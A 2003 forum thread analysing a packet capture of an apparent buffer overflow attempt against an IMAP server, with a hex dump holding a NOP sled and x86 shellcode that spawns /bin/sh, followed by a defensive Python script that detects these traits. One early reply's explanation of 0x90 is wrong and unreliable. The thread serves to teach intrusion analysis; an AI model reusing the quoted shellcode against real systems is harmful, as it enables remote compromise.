bsdjunkie
March 18th, 2003, 21:14
Ok, yet another easy one.... What can you tell from this capture? What's the attacker trying to exploit? What's the significance of the 0x90 in hex?

good luck =P


052499-22:27:58.403313 192.168.1.4:1034 -> 192.168.1.3:143
TCP TTL:64 TOS:0x0 DF
***PA* Seq: 0x5295B44E Ack: 0x1B4F8970 Win: 0x7D78
90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 3B ...............;
5E 89 76 08 31 ED 31 C9 31 C0 88 6E 07 89 6E 0C ^.v.1.1.1..n..n.
B0 0B 89 F3 8D 6E 08 89 E9 8D 6E 0C 89 EA CD 80 .....n....n.....
31 DB 89 D8 40 CD 80 90 90 90 90 90 90 90 90 90 1...@...........
90 90 90 90 90 90 90 90 90 90 90 E8 C0 FF FF FF ................
2F 62 69 6E 2F 73 68 90 90 90 90 90 90 90 90 90 /bin/sh.........

schotty
March 19th, 2003, 02:51
Ok, yet another easy one.... What can you tell from this capture? What's the attacker trying to exploit? What's the significance of the 0x90 in hex?

good luck =P


052499-22:27:58.403313 192.168.1.4:1034 -> 192.168.1.3:143
TCP TTL:64 TOS:0x0 DF
***PA* Seq: 0x5295B44E Ack: 0x1B4F8970 Win: 0x7D78
90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 3B ...............;
5E 89 76 08 31 ED 31 C9 31 C0 88 6E 07 89 6E 0C ^.v.1.1.1..n..n.
B0 0B 89 F3 8D 6E 08 89 E9 8D 6E 0C 89 EA CD 80 .....n....n.....
31 DB 89 D8 40 CD 80 90 90 90 90 90 90 90 90 90 1...@...........
90 90 90 90 90 90 90 90 90 90 90 E8 C0 FF FF FF ................
2F 62 69 6E 2F 73 68 90 90 90 90 90 90 90 90 90 /bin/sh.........

Hmm not sure, but this would make me very suspicious without knowing more info. 0x90 is M^P which when sent to /bin/sh should IIRC do a previous command executed. So unless someone is telnetted in legitimately, there are possible problems ;D

bsdjunkie
March 24th, 2003, 12:39
No one else has any ideas/input on this?

Strog
March 24th, 2003, 22:57
0x90 in hex is NOP codes for Intel-based remote buffer overflow-based attacks.

My guess is a buffer overflow attempt on the imap service at 10:27pm. That's the best I can do at the moment. I really need to educate myself better in this area.

:roll:

schotty
March 24th, 2003, 23:49
I really need to educate myself better in this area.


Don't feel alone ;D As you may have noticed, I am not exactly God in Net Security.


BTW, how the hell close was I?

bsdjunkie
March 25th, 2003, 12:30
Strog has it right. This was a buffer overflow attempt against port 143 which runs the IMAP daemon. As you can see the attacker is trying to get a root shell. The 0x90 are NOPs and this is commonly referred to as a NOP Sled.

A NOP sled is a series of no-operation instructions in the machine code of the target architecture. This series is often used as part of a buffer overflow technique, where the return address in the call stack is modified to point to exploit code. By using a NOP sled, the precise address of the exploit code need not be known — instead, an address in the middle of the NOPs is chosen, causing execution to slide into the exploit code.
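To make the answer concrete from the defender's side, here is an added example (not code from anyone in the thread) that parses the Snort-style text dump posted above and flags the same three things the thread points at: runs of 0x90 (a NOP sled), the `/bin/sh` string, and the `CD 80` (`int 0x80`) system-call opcode, together with the destination port 143. The capture text is embedded inline, copied from the original post, so the script runs offline; the thresholds, function names and the report layout are my own choices.

```python
import re

# Sample input: the Snort-style dump from the original post, embedded so the
# script needs no pcap or log file.
SAMPLE_CAPTURE = """\
052499-22:27:58.403313 192.168.1.4:1034 -> 192.168.1.3:143
TCP TTL:64 TOS:0x0 DF
***PA* Seq: 0x5295B44E Ack: 0x1B4F8970 Win: 0x7D78
90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 3B ...............;
5E 89 76 08 31 ED 31 C9 31 C0 88 6E 07 89 6E 0C ^.v.1.1.1..n..n.
B0 0B 89 F3 8D 6E 08 89 E9 8D 6E 0C 89 EA CD 80 .....n....n.....
31 DB 89 D8 40 CD 80 90 90 90 90 90 90 90 90 90 1...@...........
90 90 90 90 90 90 90 90 90 90 90 E8 C0 FF FF FF ................
2F 62 69 6E 2F 73 68 90 90 90 90 90 90 90 90 90 /bin/sh.........
"""

# Up to 16 "XX " byte tokens at the start of a line; the ASCII column that
# follows is ignored because it can contain hex-looking characters.
HEX_LINE = re.compile(r"^((?:[0-9A-Fa-f]{2} ){1,16})")
# "timestamp src:port -> dst:port"
HEADER = re.compile(r"^(\S+)\s+(\S+) -> (\S+)$")

X86_NOP = 0x90          # single-byte NOP on x86, the sled byte in the capture
INT80 = b"\xcd\x80"     # x86 "int 0x80" Linux syscall opcode


def parse_capture(text):
    """Return (header dict, payload bytes) from a Snort-style text dump."""
    header = {}
    payload = bytearray()
    for line in text.splitlines():
        m = HEADER.match(line)
        if m:
            header["timestamp"], header["src"], header["dst"] = m.groups()
            continue
        m = HEX_LINE.match(line)
        if m:
            payload.extend(bytes.fromhex(m.group(1)))
    return header, bytes(payload)


def longest_nop_run(payload, nop=X86_NOP):
    """Length of the longest unbroken run of the NOP byte."""
    best = cur = 0
    for b in payload:
        cur = cur + 1 if b == nop else 0
        best = max(best, cur)
    return best


def find_nop_sleds(payload, min_len=8, nop=X86_NOP):
    """Return (offset, length) for every run of at least min_len NOP bytes."""
    sleds = []
    start = None
    # A sentinel byte that is not a NOP flushes a run ending at the payload's tail.
    for i, b in enumerate(payload + b"\x00"):
        if b == nop:
            if start is None:
                start = i
        elif start is not None:
            if i - start >= min_len:
                sleds.append((start, i - start))
            start = None
    return sleds


def report(text, min_sled=8):
    """Triage summary: where the packet went and which shellcode traits it shows."""
    header, payload = parse_capture(text)
    dst = header.get("dst", "")
    dst_port = int(dst.rsplit(":", 1)[1]) if ":" in dst else None
    findings = []
    sleds = find_nop_sleds(payload, min_sled)
    if sleds:
        findings.append("NOP sled(s) at (offset, length): %s" % sleds)
    if b"/bin/sh" in payload:
        findings.append("shell path /bin/sh at offset %d" % payload.index(b"/bin/sh"))
    if INT80 in payload:
        findings.append("int 0x80 syscall opcode present (%d times)" % payload.count(INT80))
    return {
        "dst": dst,
        "dst_port": dst_port,
        "payload_len": len(payload),
        "longest_nop_run": longest_nop_run(payload),
        "findings": findings,
    }


if __name__ == "__main__":
    r = report(SAMPLE_CAPTURE)
    print("to %s (port %s), %d payload bytes, longest NOP run %d"
          % (r["dst"], r["dst_port"], r["payload_len"], r["longest_nop_run"]))
    for f in r["findings"]:
        print(" -", f)
```

On the posted capture this reports the 14-byte sled at offset 0, a 20-byte sled spanning the fourth and fifth dump lines, a trailing 9-byte run, `/bin/sh` at offset 80 and two `int 0x80` opcodes, all headed for port 143. Treat a run of 0x90 on its own as a triage signal rather than proof: binary protocols and file transfers can legitimately carry such runs, which is why the report pairs it with the shell string and the syscall opcode before anyone raises an alert.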